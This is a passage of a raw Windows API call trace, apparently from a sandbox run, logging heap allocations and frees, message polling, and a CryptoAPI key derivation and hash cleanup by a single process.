hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0225.444] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0225.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0225.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51448 [0225.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51448, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.447] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0225.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0225.448] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87410, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87550) returned 1 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0225.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0225.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0225.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0225.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0225.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0225.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0225.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0225.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0225.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0225.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0225.452] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.452] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0225.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a48 [0225.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0225.453] CryptDestroyHash (hHash=0xa87410) returned 1 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.453] RtlAllocateHeap 